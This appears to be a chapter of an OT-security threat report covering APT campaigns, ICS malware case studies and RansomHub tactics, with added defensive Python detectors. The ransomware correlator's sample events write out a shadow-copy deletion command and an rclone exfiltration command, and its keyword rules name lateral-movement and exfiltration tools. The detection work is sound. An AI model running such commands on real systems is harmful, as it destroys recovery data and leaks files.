The Changing Threat Landscape of OT Environments
This chapter examines key threat patterns, notable incidents, and actionable steps to mitigate risks, offering a comprehensive view of the state of OT cybersecurity.
Spill-Over Effects of IT-OT Integration
In today’s rapidly digitalizing world, the traditional isolation of OT systems has given way to their close integration with IT systems. While this convergence has improved operational efficiency, it has also opened new doors for attackers. Data shows that 94% of organizations encountered OT cybersecurity incidents in the past 12 months, with IT environments playing a role in 98% of these cases—68% through direct penetration attacks and 30% through collateral damage. This highlights the ‘spill-over effect,’ where breaches in IT systems expose vulnerabilities at the IT-OT boundary.
The Human Factor is Key
Attackers often exploit weak links in this integration, such as credential leaks or misconfigured firewall rules, to move laterally into OT environments. Phishing campaigns targeting employees (41%) and errors by staff (39%) are the dominant attack vectors, underscoring the critical role of human factors in these incidents. As OT environments become increasingly interconnected with IT systems, traditional one-size-fits-all security approaches are proving ineffective, necessitating more tailored and proactive measures.

Figure 1.1. The Spill-Over Effect: Attacks on IT are Impacting OT (Sources of Cyber Incidents Impacting OT Environments, Total)
Survey questions: QB1: Has your organization experienced a cyber incident in its OT (Operational Technology) environment in the past 12 months? QB1a: Regarding the cyber incidents you experienced this year, did these incidents affect OT systems through IT systems? (Response options: yes, through penetration attacks originating in the IT environment; yes, as a collateral impact from the IT environment; no, they were exclusively OT-targeted incidents; uncertain.)

Figure 1.2. OT Security Incidents Experienced in the Past 12 Months (QB1b: Which of the following OT security incidents have you encountered in your organization in the past 12 months?)
Ongoing Geopolitical Risks for Critical Infrastructure
Critical infrastructure faces persistent risks, exacerbated by geopolitical tensions. During periods of strained international relations, these facilities are frequently targeted by nation-state attackers who aim to disrupt operations for the sake of gaining political and military advantages. This emphasizes OT systems’ vulnerabilities in the context of hybrid warfare. Based on the TXOne Threat Research Team’s 2024 analysis of APT group attack landscapes, several key threat patterns have been identified.
APT Groups Targeting Exposed OT Devices on the Internet
From October 2023 to June 2024, multiple attacks targeted OT devices exposed to the internet within the U.S. water and wastewater systems (WWS) sector. According to CISA investigations, these cyberattacks were carried out by groups linked to the Iranian Islamic Revolutionary Guard Corps (IRGC), specifically CyberAv3ngers (tracked by Microsoft as Storm-0784) and pro-Russian hacker organizations.[1]
Recent research[2] also revealed that the CyberAv3ngers threat group utilized IOCONTROL malware to target IoT and OT devices in the U.S. and Israel, including Programmable Logic Controllers (PLCs), Human Machine Interfaces (HMIs), IP cameras, perimeter devices, and Linux-based IoT/OT platforms. Through reverse engineering, it was discovered that IOCONTROL is one of the few malware strains targeting Linux-based ICS systems.
Notably, IOCONTROL employs Message Queuing Telemetry Transport (MQTT), a protocol commonly used in industrial IoT, for command-and-control (C2) communications. Furthermore, its MQTT communications are SSL-encrypted, making it challenging for standard network devices to detect these malicious activities and leaving victims largely unaware of infection. These incidents amply demonstrate the vulnerabilities of OT systems as weak points in escalating geopolitical conflicts.
Satellite Network Attacks: Emerging Risks for OT Environments

Modern warfare increasingly relies on satellite technology to control drones and facilitate network communications, prompting threat actors to develop tactics such as denial-of-service (DoS) attacks or hijacking techniques against satellites. For example, conflict zones like the Black Sea and the Mediterranean Sea have faced widespread satellite network interference throughout 2024,[3] disrupting OT environments reliant on satellite technology. This trend has been observed in instances such as widespread GPS jamming in war zones, where interference caused ships to appear to be located at airports due to navigational errors.[4]
Our research indicates that these types of attacks do not require significant financial resources. Adversaries can execute satellite hijacking attacks with equipment costing as little as $300, utilizing simple receivers and modulators. Despite this vulnerability, the cost-efficiency of Low Earth Orbit (LEO) satellites continues to drive their adoption in critical infrastructure. Further, many manufacturers now offer solutions that enable OT environment devices to connect directly to remote systems via satellite networks.
The lack of a universal solution to prevent satellite network attacks poses a significant risk in general-use environments. Attackers could potentially gain direct control over operational control systems or even take over entire OT environments. This emerging vulnerability highlights the urgent need for protective measures and the development of resilient satellite communication protocols to safeguard critical OT systems.

Exploiting Supply Chains and Vulnerabilities
Supply chain attacks have emerged as a major cybersecurity threat vector in recent years. 37% of organizations said that attackers exploit software vulnerabilities to infiltrate target systems. Once a single link in the supply chain is compromised, the security of the entire system is endangered.
Vulnerabilities in Remote Access Solutions
In early 2024, five zero-day vulnerabilities were disclosed in a well-known remote access solution,[5] some of which were actively exploited for unauthorized remote code execution (RCE) and weaponized by nation-state actors. Despite the vendor’s collaboration with regulatory bodies to issue patches, each patch cycle attracted more attackers attempting new angles of exploitation. This case illustrates the race between patching speed and exploit development in the supply chain, and it serves as a reminder for organizations to apply patches promptly while implementing layered defenses to counter increasingly sophisticated attack methods.[6]
North Korean Threat Actor Exploits Supply Chain Vulnerabilities and Deploys Custom RAT
In July 2024, the U.S. Department of Justice indicted an individual linked to North Korean threat actor Onyx Sleet. Onyx Sleet’s operations demonstrated new forms of attacks by exploiting initial access vulnerabilities, such as Log4j and several N-day vulnerabilities, followed by the implantation of a custom remote access trojan (RAT) identified by Kaspersky as Dtrack,[7] which was observed in global attacks from September 2019 to January 2024. They successfully targeted multiple entities in India, South Korea, and the United States, including defense and energy sectors, engaging in persistent infiltration activities. These incidents highlight the increasing sophistication of attackers leveraging vulnerabilities.[8]
Perimeter Device Vulnerabilities Exploited to Infiltrate Critical Infrastructure Networks
In 2024, China’s APT groups escalated their cyber operations, targeting critical infrastructure and OT systems to disrupt U.S. capabilities.[9] Volt Typhoon, first identified in 2023, expanded its botnet infrastructure to exploit small office/home office (SOHO) and End-of-Life (EOL) devices within the critical infrastructure sector.[10] Similarly, Flax Typhoon, operating under the Chinese entity Integrity Technology Group, deployed a massive botnet known as Raptor Train, comprising over 200,000 compromised devices. Leveraging vulnerabilities across over 20 device brands, including routers, IP cameras, and NAS servers, they deployed Nosedive malware, enabling remote command execution and Distributed Denial of Service (DDoS) attacks.[11][12]
Figure 1.4. Threat Actors Exploited Firewall Vulnerabilities to Attack Denmark’s Remote OT Environments
As perimeter devices are relatively accessible to external attackers, they have become prime targets for nation-state APT groups. Their vulnerabilities leave organizations—regardless of size or location—susceptible to opportunistic intrusion attempts, leading to OT network infiltration. For example, in late 2023, Danish power grid operators, relying on the same brand of firewalls as OT network buffers, became victims of large-scale APT attacks exploiting that year’s firewall vulnerabilities.[13] The attackers successfully gained control over sections of the grid.
In December 2024, the U.S. government accused Chinese hackers of exploiting tens of thousands of global firewall devices and developing zero-day vulnerabilities.[14] Within a month of the vulnerability’s disclosure, attempts to breach Danish critical infrastructure surged dramatically.[15] These incidents highlight the urgent need for critical infrastructure and manufacturing sectors to proactively address perimeter device vulnerabilities.
Emerging Industrial Control System Malware
A significant new threat to critical infrastructure is the emergence of ICS malware such as Fuxnet and FrostyGoop, both designed specifically for OT environments and believed to have geopolitical connections.

Case Study 1
Fuxnet ICS Malware
Fuxnet, linked to the Blackjack hacking group (allegedly tied to Ukrainian security agencies), was implicated in a major attack against Moscollector, a Moscow-based company managing water supply, wastewater treatment, and communication systems.[16][17] Using malware similar to Stuxnet, Fuxnet disabled industrial sensors and disrupted operations across multiple sectors. The malware specifically targeted sensor gateways utilizing serial bus protocols like RS485 and Meter-Bus rather than the sensors themselves.
It began by deleting critical files and directories, shutting down remote access services, and corrupting routing table information. It then damaged file systems, reprogrammed device firmware, and physically destroyed NAND storage chips. Most critically, Fuxnet sent random data to connected sensor gateways, overloading communication channels and effectively disabling the sensors.[18]

Case Study 2
FrostyGoop ICS Malware
FrostyGoop, another geopolitically motivated OT malware, was used in a cyberattack on a municipal energy company in Ukraine, disrupting heating services to over 600 apartment buildings for two days.[19] This malware specifically targeted control systems using the Modbus TCP protocol, a common industrial standard. The attackers gained initial access through external routers, exfiltrating user credentials from the victim’s network. Exploiting weak network segmentation, they established secondary tunnels to penetrate the OT network.
Uniquely, FrostyGoop avoided deploying malware onto targeted network assets, thereby reducing the risk of detection, analysis, and forensic investigation. Instead, it relied on remote access to directly send unauthorized Modbus TCP commands to ENCO controllers managing the heating systems, causing system failures and inaccurate measurements. This technique bypasses host-based detection and prevention defenses, making it particularly challenging to counter. FrostyGoop poses a significant threat to global ICS sectors, including energy, water and wastewater management, manufacturing, transportation, and oil and gas industries.[20]
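Because FrostyGoop never placed code on the controllers, the visible evidence is on the wire: Modbus TCP write commands arriving from a host that has no business issuing them. The following is an added example, not code from this report or from any vendor: a small Modbus/TCP inspector that parses the MBAP header and flags write function codes from sources outside an assumed allowlist. The IP addresses, the allowlist, and the captured frames are constructed for the demonstration.

```python
"""Network-side detection of unauthorized Modbus TCP writes of the kind FrostyGoop issued."""
import struct
from typing import Dict, List, Tuple

# Function codes that change controller state; reads (1-4) are reconnaissance at worst.
WRITE_FUNCTION_CODES = {5: "Write Single Coil", 6: "Write Single Register",
                        15: "Write Multiple Coils", 16: "Write Multiple Registers",
                        22: "Mask Write Register", 23: "Read/Write Multiple Registers"}
# Assumed allowlist: only the HMI and the engineering workstation may write to controllers.
AUTHORIZED_WRITERS = {"10.0.1.10", "10.0.1.11"}

def parse_mbap(frame: bytes) -> Dict[str, int]:
    """Split a Modbus/TCP frame into its MBAP header fields plus the PDU function code."""
    if len(frame) < 8:
        raise ValueError("frame shorter than MBAP header + function code")
    tid, proto, length, unit, fc = struct.unpack(">HHHBB", frame[:8])
    if proto != 0:
        raise ValueError(f"protocol id {proto} is not Modbus")
    if length != len(frame) - 6:  # the length field counts unit id + PDU only
        raise ValueError("MBAP length does not match frame size")
    return {"transaction_id": tid, "unit_id": unit, "function_code": fc}

def inspect(packets: List[Tuple[str, str, bytes]]) -> List[Dict[str, str]]:
    """Return one finding per packet that is malformed or violates the write allowlist."""
    findings = []
    for src, dst, frame in packets:
        try:
            hdr = parse_mbap(frame)
        except ValueError as err:
            findings.append({"src": src, "dst": dst, "severity": "medium", "reason": f"malformed: {err}"})
            continue
        fc = hdr["function_code"]
        if fc in WRITE_FUNCTION_CODES and src not in AUTHORIZED_WRITERS:
            findings.append({"src": src, "dst": dst, "severity": "high",
                             "reason": f"{WRITE_FUNCTION_CODES[fc]} (FC {fc}) from unauthorized host"})
        elif fc not in WRITE_FUNCTION_CODES and src not in AUTHORIZED_WRITERS:
            findings.append({"src": src, "dst": dst, "severity": "low",
                             "reason": f"read FC {fc} from a host not expected to poll this unit"})
    return findings

# Constructed traffic: (source IP, destination IP, raw Modbus/TCP frame).
SAMPLE_PACKETS = [
    ("10.0.1.10", "10.0.1.50", bytes.fromhex("0001 0000 0006 01 06 0010 0001")),                # HMI write, allowed
    ("10.0.9.77", "10.0.1.50", bytes.fromhex("0002 0000 0006 01 03 0000 000A")),                # unknown host reads 10 registers
    ("10.0.9.77", "10.0.1.50", bytes.fromhex("0003 0000 000B 01 10 0000 0002 04 0000 0000")),  # unknown host writes 2 registers
    ("10.0.9.77", "10.0.1.50", bytes.fromhex("0004 0001 0006 01 06 0010 0000")),                # protocol id is not 0
]

if __name__ == "__main__":
    for finding in inspect(SAMPLE_PACKETS):
        print(finding)
```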

Case Study 3
Chaya_003
Researchers identified three binary files, labeled Chaya_003, designed to terminate Siemens TIA Portal processes running on engineering workstations, as well as other related processes.[21] Their analysis revealed that the attackers used Discord webhooks, which allow automated messages and data updates to be posted to Discord servers, as part of their command-and-control (C2) infrastructure. The approach combines system reconnaissance with process disruption: regardless of whether the process termination succeeded or failed, the attackers used the webhooks to report the status back to their servers.
Additionally, two of the binary files were named “Isass.exe” and “elsass.exe”, indicating an attempt to mimic legitimate system processes. This tactic likely aims to deceive users or bypass antivirus solutions.
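Two of the Chaya_003 behaviours above are cheap to check on an engineering workstation: a process name that visually imitates a system process, and a process posting to a Discord webhook. The following is an added example, not code from this report or from the researchers cited: a triage routine over a constructed process inventory. The confusable-character map, the protected process list, the paths and the placeholder webhook URL are all assumptions made for the demonstration.

```python
"""Heuristics for the Chaya_003 behaviours: lookalike process names and webhook-based C2."""
from typing import Dict, List, Optional
from urllib.parse import urlparse

PROTECTED_NAMES = {"lsass.exe", "svchost.exe", "csrss.exe"}   # commonly imitated Windows processes
SYSTEM_DIR = "c:\\windows\\system32\\"
# Characters that look alike in common UI fonts (constructed map, intentionally small).
CONFUSABLES = str.maketrans({"i": "l", "1": "l", "|": "l", "0": "o"})
WEBHOOK_HOSTS = {"discord.com", "discordapp.com"}

def levenshtein(a: str, b: str) -> int:
    """Edit distance between two strings (insert, delete, substitute)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]

def lookalike_of(name: str) -> Optional[str]:
    """Return the protected process name that `name` imitates (e.g. Isass.exe -> lsass.exe)."""
    low, norm = name.lower(), name.lower().translate(CONFUSABLES)
    for real in PROTECTED_NAMES:
        if low == real:
            continue
        if levenshtein(norm, real) <= 1 or real[:-4] in norm:   # one edit away, or real name embedded
            return real
    return None

def is_discord_webhook(url: str) -> bool:
    p = urlparse(url)
    return p.scheme == "https" and (p.hostname or "") in WEBHOOK_HOSTS and p.path.startswith("/api/webhooks/")

def triage(processes: List[Dict]) -> List[Dict]:
    """Return every process record that has at least one reason to be looked at."""
    alerts = []
    for proc in processes:
        reasons = []
        target = lookalike_of(proc["name"])
        if target:
            reasons.append(f"name imitates {target}")
        if proc["name"].lower() in PROTECTED_NAMES and not proc["path"].lower().startswith(SYSTEM_DIR):
            reasons.append("system process name running outside System32")
        if any(is_discord_webhook(u) for u in proc.get("urls", [])):
            reasons.append("posts to a Discord webhook")
        if reasons:
            alerts.append({"name": proc["name"], "path": proc["path"], "reasons": reasons})
    return alerts

# Constructed process inventory; the webhook URL is a placeholder, not a real endpoint.
SAMPLE_PROCESSES = [
    {"name": "lsass.exe", "path": r"C:\Windows\System32\lsass.exe", "urls": []},
    {"name": "Isass.exe", "path": r"C:\Users\eng\AppData\Local\Temp\Isass.exe",
     "urls": ["https://discord.com/api/webhooks/000000/PLACEHOLDER"]},
    {"name": "elsass.exe", "path": r"C:\ProgramData\elsass.exe", "urls": []},
    {"name": "lsass.exe", "path": r"C:\Users\Public\lsass.exe", "urls": []},
    {"name": "notepad.exe", "path": r"C:\Windows\System32\notepad.exe", "urls": ["https://example.invalid/"]},
]

if __name__ == "__main__":
    for alert in triage(SAMPLE_PROCESSES):
        print(alert)
```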

Case Study 4
Ramnit Worm
Ramnit is a form of malware that emerged in 2010 as a banking trojan designed to steal user credentials and sell them on dark-net forums. Over time, Ramnit evolved into a modular platform capable of downloading various plugins from its C2 server, enabling advanced functionalities such as remote desktop control and screenshot capture.[22] In 2024, two Ramnit cluster samples were identified and submitted to VirusTotal.
The samples were executables of Mitsubishi GX Works software on engineering workstations (EWS) that had been infected with the Ramnit worm. While the exact method of entry into OT environments remains unclear, the worm is suspected to spread via compromised physical devices, such as USB drives, or through poorly segmented network infrastructures, posing a significant threat to OT systems.[23]

Case Study 5
IOCONTROL
As discussed in the previous section, IOCONTROL is notable as one of the few malware strains targeting Linux-based ICS systems. The CyberAv3ngers group used it to attack IoT and OT devices in the U.S. and Israel, including PLCs, HMIs, IP cameras, and Linux-based platforms. On an infected device, IOCONTROL installs a backdoor at /usr/bin/iocontrol with a persistence script at /etc/rc3.d/S93InitSystemd.sh, and it uses SSL-encrypted MQTT communications for C2, making detection difficult. These attacks highlight the vulnerabilities of OT systems amid rising geopolitical tensions.
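The two file paths above and the MQTT-over-TLS channel are enough for a basic host audit on a Linux-based OT device, which serves both the earlier IOCONTROL discussion and this case study. The following is an added example, not code from this report or from the researchers who analysed the malware: it checks a filesystem root for the named artefacts and parses `ss -tnp` output for TLS-MQTT peers owned by unexpected processes. It assumes the IANA-registered MQTT-over-TLS port 8883 (the report does not state the port), an assumed allowlist of legitimate MQTT clients, and a constructed process name `iocontrol`.

```python
"""Host audit for the IOCONTROL persistence artefacts and its MQTT-over-TLS C2 channel."""
import os
import re
import tempfile
from typing import List

# Persistence artefacts named in the report, relative to the filesystem root.
KNOWN_ARTEFACTS = ["usr/bin/iocontrol", "etc/rc3.d/S93InitSystemd.sh"]
# Processes expected to speak MQTT over TLS on this device (assumed, site-specific allowlist).
EXPECTED_MQTT_CLIENTS = {"telegraf", "mosquitto"}
MQTT_TLS_PORT = "8883"  # IANA-registered port for MQTT over TLS; an assumption, not from the report

# Matches data lines of `ss -tnp`: state, queues, local, peer, and the owning process.
SS_LINE = re.compile(r'^\S+\s+\d+\s+\d+\s+(\S+)\s+(\S+)\s+users:\(\("([^"]+)",pid=(\d+)')

def find_artefacts(root: str) -> List[str]:
    """Return the known IOCONTROL paths that exist under root ('/' on a live device)."""
    return [p for p in KNOWN_ARTEFACTS if os.path.exists(os.path.join(root, p))]

def find_unexpected_mqtt(ss_output: str) -> List[dict]:
    """Flag established connections to the MQTT-over-TLS port owned by non-allowlisted processes."""
    hits = []
    for line in ss_output.splitlines():
        m = SS_LINE.match(line.strip())
        if not m:
            continue
        _local, peer, proc, pid = m.groups()
        if peer.rsplit(":", 1)[-1] == MQTT_TLS_PORT and proc not in EXPECTED_MQTT_CLIENTS:
            hits.append({"process": proc, "pid": int(pid), "peer": peer})
    return hits

def audit_host(root: str, ss_output: str) -> dict:
    return {"artefacts": find_artefacts(root), "mqtt": find_unexpected_mqtt(ss_output)}

def build_demo_root() -> str:
    """Constructed demo filesystem containing both artefacts as empty files."""
    root = tempfile.mkdtemp(prefix="iocontrol-demo-")
    for p in KNOWN_ARTEFACTS:
        full = os.path.join(root, p)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        open(full, "w").close()
    return root

# Constructed `ss -tnp` listing; 203.0.113.7 is a documentation address standing in for a C2 peer.
SAMPLE_SS = """State  Recv-Q Send-Q Local Address:Port   Peer Address:Port   Process
ESTAB  0      0      192.168.10.5:41234   203.0.113.7:8883    users:(("iocontrol",pid=1337,fd=5))
ESTAB  0      0      192.168.10.5:39002   192.168.10.9:8883   users:(("telegraf",pid=812,fd=7))
ESTAB  0      0      192.168.10.5:52110   192.168.10.20:502   users:(("modbusd",pid=900,fd=3))
"""

if __name__ == "__main__":
    print(audit_host(build_demo_root(), SAMPLE_SS))
```

On a live device the call would be `audit_host("/", subprocess.check_output(["ss", "-tnp"], text=True))`; a hit from an unknown process is a reason to capture the binary and the rc3.d script before remediating.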
Ransomware
The Need for Ongoing Vigilance
From the perspective of ransomware victims, the growth rate of reported cases in 2024 has slowed. However, ransomware continues to pose a significant threat to national security, public safety, and economic prosperity.
Observing trends from 2024 to date, ransomware attacks targeting the pharmaceutical and healthcare sectors remain disproportionately high, followed by manufacturing and industrial manufacturing services, ranked second and third, respectively.

Note: These statistics are derived from self-reports by ransomware groups, which might not always correlate precisely with actual incidents.
Figure 1.5. Number of Victims Affected by Ransomware Attacks from 2022-2024
Notably, some ransomware groups have demonstrated the ability to recover swiftly from takedowns by law enforcement and launch retaliatory actions. For example, BlackCat, despite being dismantled by the FBI, resumed operations within a day, continuing to threaten hospitals and nuclear power plants with barely any disruption. In 2024, the group targeted a major U.S. healthcare institution.[24] Even after the victim paid a $22 million ransom, system restoration remained challenging, necessitating intervention from the White House and Congress.
Similarly, when LockBit’s dark web extortion site was infiltrated by law enforcement in 2024, the group quickly recovered and vowed to launch retaliatory attacks on one million companies worldwide. Ransomware groups continue to evolve their tactics to bypass defenses and escalate their impact, making them increasingly difficult to neutralize. Their resilience and adaptability underscore the urgent need for enhanced cybersecurity measures across all sectors.
Key Ransomware Trends in 2024
In addition, we have observed the rapid rise of the RansomHub ransomware organization in February 2024. Operating under the Ransomware-as-a-Service (RaaS) model, it has quickly become one of the most active ransomware groups. Notably, its recent focus on Supervisory Control and Data Acquisition (SCADA) systems highlights the growing threat of ransomware to critical infrastructure and OT environments.[25][26] Key characteristics of RansomHub include the following:

Leveraging Initial Access Brokers (IAB)
RansomHub purchases vulnerabilities or credentials from IABs to gain access to target organizations’ networks and improve attack efficiency. Observed methods for obtaining initial access include phishing emails, spear-phishing attacks, exploitation of vulnerabilities, and password spraying. Reports, such as findings from the Internet Crime Complaint Center (IC3), indicate the exploitation of known vulnerabilities such as Zerologon and flaws in Citrix ADC.[27][28] Once inside, RansomHub has been noted to use tools like EDRKillShifter to disable EDR and antivirus software.

Disabling Antivirus and Shadow Copy Services
Once inside a victim’s system, RansomHub deploys EDRKillShifter, a Bring Your Own Vulnerable Driver (BYOVD) tool, to decrypt and load vulnerable legitimate drivers. This tactic successfully disables antivirus software and deletes shadow copies, making recovery more difficult for the victim organization. The malware also deletes related event logs, complicating forensic investigations.

Utilizing LSASS Dumps and Domain Credential Dumps for Lateral Movement
After disabling antivirus software, RansomHub elevates privileges by registering new accounts or reactivating disabled accounts in the registry. It extracts LSASS dumps from compromised computers and uses tools like Netscan to identify additional targets for lateral movement. Common techniques include Remote Desktop Protocol (RDP), PsExec, and Cobalt Strike.

Data Theft for Double Extortion
RansomHub employs tools like Rclone, PuTTY, WinSCP, and Cobalt Strike to exfiltrate data to its servers. Interestingly, the ransomware deployed by RansomHub does not inherently include data exfiltration capabilities. Instead, this step occurs only after successfully infiltrating, disabling antivirus defenses, and escalating privileges. Following data theft, encryption begins, accompanied by ransom demands.
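Each RansomHub stage above leaves a distinct host-side trace (a driver loaded from an odd path, shadow copies deleted, an account created or re-enabled, LSASS opened, the Security log cleared, an exfiltration tool launched), and no single one is conclusive, so the useful detection is a correlation of several within a short window. The following is an added example, not code from this report or from any EDR product: stage rules over simplified Windows Security and Sysmon events, plus a per-host time-window correlator. The event records, host names, paths and the driver directory rule are constructed for the demonstration.

```python
"""Correlate the RansomHub post-access stages listed above from Windows and Sysmon events."""
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, Optional, Tuple

Event = Tuple[str, str, int, Dict[str, str]]  # (ISO timestamp, host, event id, selected fields)
DRIVER_DIR = "c:\\windows\\system32\\drivers\\"

def stage(event_id: int, f: Dict[str, str]) -> Optional[str]:
    """Map one event to the attack stage it evidences, or None if it is not of interest."""
    cmd = f.get("CommandLine", "").lower()
    if event_id == 6 and not f.get("ImageLoaded", "").lower().startswith(DRIVER_DIR):
        return "driver_loaded_from_unusual_path"   # Sysmon DriverLoad; BYOVD loaders such as EDRKillShifter
    if event_id == 4688 and "vssadmin" in cmd and "delete shadows" in cmd:
        return "shadow_copy_deletion"              # Security 4688: process creation with command line
    if event_id == 4688 and any(t in cmd for t in ("rclone", "winscp", "psexec", "netscan")):
        return "exfil_or_lateral_movement_tool"
    if event_id in (4720, 4722):                   # account created / disabled account enabled
        return "account_created_or_enabled"
    if event_id == 10 and f.get("TargetImage", "").lower().endswith("lsass.exe"):
        return "lsass_access"                      # Sysmon ProcessAccess against LSASS (credential dumping)
    if event_id == 1102:                           # Security audit log cleared
        return "event_log_cleared"
    return None

def correlate(events: List[Event], window_minutes: int = 60, min_stages: int = 3) -> Dict[str, List[str]]:
    """Alert on hosts where at least min_stages distinct stages occur within one time window."""
    by_host: Dict[str, list] = defaultdict(list)
    for ts, host, eid, fields in events:
        s = stage(eid, fields)
        if s:
            by_host[host].append((datetime.fromisoformat(ts), s))
    alerts, window = {}, timedelta(minutes=window_minutes)
    for host, items in by_host.items():
        items.sort()
        for i, (start, _) in enumerate(items):
            seen = {s for t, s in items[i:] if t - start <= window}
            if len(seen) >= min_stages:
                alerts[host] = sorted(seen)
                break
    return alerts

# Constructed events in a simplified shape; the stage rules use only these fields.
SAMPLE_EVENTS: List[Event] = [
    ("2024-06-01T02:00:10", "EWS-01", 6,    {"ImageLoaded": r"C:\Users\Public\drv.sys"}),
    ("2024-06-01T02:01:30", "EWS-01", 4688, {"CommandLine": "vssadmin.exe delete shadows /all /quiet"}),
    ("2024-06-01T02:02:05", "EWS-01", 4720, {"TargetUserName": "svc_backup2"}),
    ("2024-06-01T02:02:40", "EWS-01", 10,   {"TargetImage": r"C:\Windows\System32\lsass.exe"}),
    ("2024-06-01T02:05:00", "EWS-01", 1102, {}),
    ("2024-06-01T02:20:00", "EWS-01", 4688, {"CommandLine": r"rclone.exe copy D:\projects remote:dump"}),
    ("2024-06-01T03:00:00", "HMI-07", 4688, {"CommandLine": "notepad.exe"}),
    ("2024-06-01T09:00:00", "HMI-07", 4722, {"TargetUserName": "operator"}),   # one stage alone is not enough
]

if __name__ == "__main__":
    print(correlate(SAMPLE_EVENTS))
```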

Figure 1.9. Top 20 Ransomware Groups in 2024
Note: These statistics are derived from self-reports by ransomware groups, which might not always correlate precisely with actual incidents.